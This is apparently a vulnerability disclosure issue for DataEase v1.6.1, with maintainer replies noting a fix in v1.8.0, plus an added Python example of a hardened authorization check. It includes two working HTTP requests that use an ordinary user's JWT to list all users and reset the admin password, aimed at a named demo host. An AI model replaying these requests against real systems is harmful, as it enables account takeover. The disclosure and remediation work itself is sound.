DataEase version: v1.6.1
Browser version: Chrome 96.0.4664.110
Bug description: I found a Broken Access Control vulnerability. An authenticated user can access information about all users and change the admin password.
Thanks for the feedback. This problem does exist; we will deal with it as soon as possible.
Thanks for the feedback. This issue will be fixed in the next major version.
Fixed in v1.8.0; please follow the new version.
Participants: youliyuan-fit2cloud, zyyfit, BBchicken-9527
Bug reproduction steps (screenshots preferred)
```http
POST /api/user/userGrid/1/10 HTTP/1.1
Host: dataease.fit2cloud.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: application/json, text/plain, */*
Content-Type: application/json
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NDE4Nzg3MTYsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0.m02WO3Uv4xyc2OJztrSOuU7jRBPEmpoj2bGuUr-6nzg
LINK-PWD-TOKEN: null
Connection: close
Referer: https://dataease.fit2cloud.com/
Cookie: request-time-out=10; Authorization=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NDE4Nzg3MTYsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0.m02WO3Uv4xyc2OJztrSOuU7jRBPEmpoj2bGuUr-6nzg; language=zh_CN
Content-Length: 13

{"orders":[]}
```

```http
POST /api/user/adminUpdatePwd HTTP/1.1
Host: dataease.fit2cloud.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: application/json, text/plain, */*
Content-Type: application/json
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NDE4Nzg3MTYsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0.m02WO3Uv4xyc2OJztrSOuU7jRBPEmpoj2bGuUr-6nzg
LINK-PWD-TOKEN: null
Connection: close
Referer: https://dataease.fit2cloud.com/
Cookie: request-time-out=10; Authorization=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NDE4Nzg3MTYsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0.m02WO3Uv4xyc2OJztrSOuU7jRBPEmpoj2bGuUr-6nzg; language=zh_CN
Content-Length: 36

{"userId":1,"newPassword":"SECtest"}
```

Now you can log in with admin/SECtest.
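The following is an added illustration and not DataEase's code, nor a description of how v1.8.0 fixed the issue. It shows the pattern the report describes (the endpoint authenticates the caller but takes the target account from the request body) beside an authorization check that closes it: the acting user is read from the verified JWT, and changing another account's password or listing all users requires the admin role. The endpoint names and the `userId` claim come from the requests above; the HS256 signing secret, the role table, the request shape and the `demo`/`admin` tokens are constructed for the example.

```python
import base64
import hashlib
import hmac
import json
import time

# Constructed signing secret for this example only; a real deployment keeps
# its secret in configuration, never in source.
SECRET = b"example-only-secret"

# Constructed role table standing in for the application's user store.
USER_ROLES = {1: "admin", 2: "user", 3: "user"}


class Forbidden(Exception):
    """Raised when the caller may not act on the requested user."""


class InvalidToken(Exception):
    """Raised when the JWT fails its algorithm, signature or expiry check."""


def _b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def make_token(claims: dict, secret: bytes = SECRET) -> str:
    """Build an HS256 JWT; used here only to produce inputs for the scenarios."""
    header = _b64url_encode(json.dumps({"typ": "JWT", "alg": "HS256"}).encode())
    payload = _b64url_encode(json.dumps(claims).encode())
    sig = hmac.new(secret, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url_encode(sig)}"


def verify_hs256(token: str, secret: bytes = SECRET, now=None) -> dict:
    """Return the claims of a valid token; reject wrong alg, bad signature or expiry."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
    except ValueError:
        raise InvalidToken("malformed token")
    if json.loads(_b64url_decode(header_b64)).get("alg") != "HS256":
        raise InvalidToken("unexpected alg")
    expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
        raise InvalidToken("bad signature")
    claims = json.loads(_b64url_decode(payload_b64))
    current = int(time.time()) if now is None else now
    if claims.get("exp", 0) <= current:
        raise InvalidToken("expired")
    return claims


def vulnerable_admin_update_pwd(token: str, body: dict, now=None) -> dict:
    """Pattern from the report: only authentication is checked, target comes from body."""
    verify_hs256(token, now=now)
    return {"updated": body["userId"]}


def hardened_admin_update_pwd(token: str, body: dict, now=None) -> dict:
    """Authorize against the caller identity in the token: self, or admin for anyone."""
    caller = verify_hs256(token, now=now)["userId"]
    target = body["userId"]
    if caller != target and USER_ROLES.get(caller) != "admin":
        raise Forbidden(f"user {caller} may not change the password of user {target}")
    return {"updated": target}


def hardened_user_grid(token: str, now=None) -> list:
    """Listing every user (the userGrid endpoint in the report) is admin-only."""
    caller = verify_hs256(token, now=now)["userId"]
    if USER_ROLES.get(caller) != "admin":
        raise Forbidden(f"user {caller} may not list users")
    return sorted(USER_ROLES)  # constructed stand-in for the user table


def _raises(exc, fn, *args, **kwargs) -> bool:
    try:
        fn(*args, **kwargs)
    except exc:
        return True
    return False


def run_scenarios(now: int = 1641878000) -> dict:
    """Replay the report's two requests with a constructed 'demo' (userId 2) token."""
    demo = make_token({"exp": 1641878716, "userId": 2, "username": "demo"})
    admin = make_token({"exp": 1641878716, "userId": 1, "username": "admin"})
    # Forged token: demo's signature reattached to a payload claiming userId 1.
    h, _, s = demo.split(".")
    forged = f"{h}.{_b64url_encode(json.dumps({'exp': 1641878716, 'userId': 1}).encode())}.{s}"
    return {
        "vulnerable_lets_demo_reset_admin": vulnerable_admin_update_pwd(demo, {"userId": 1}, now=now) == {"updated": 1},
        "hardened_blocks_demo_reset_admin": _raises(Forbidden, hardened_admin_update_pwd, demo, {"userId": 1}, now=now),
        "hardened_allows_self": hardened_admin_update_pwd(demo, {"userId": 2}, now=now) == {"updated": 2},
        "hardened_allows_admin": hardened_admin_update_pwd(admin, {"userId": 2}, now=now) == {"updated": 2},
        "hardened_blocks_demo_listing": _raises(Forbidden, hardened_user_grid, demo, now=now),
        "forged_claims_rejected": _raises(InvalidToken, verify_hs256, forged, now=now),
        "expired_rejected": _raises(InvalidToken, verify_hs256, demo, now=1641878716),
    }


if __name__ == "__main__":
    for name, ok in run_scenarios().items():
        print(f"{name}: {ok}")
```

The check deliberately never reads the acting user from the body or from any client-controlled field; the only trusted source of identity is the signature-verified claim set. Whether the real application should additionally require the caller's current password for a self-service change, or route admin resets through a separate endpoint, is a product decision the issue does not settle.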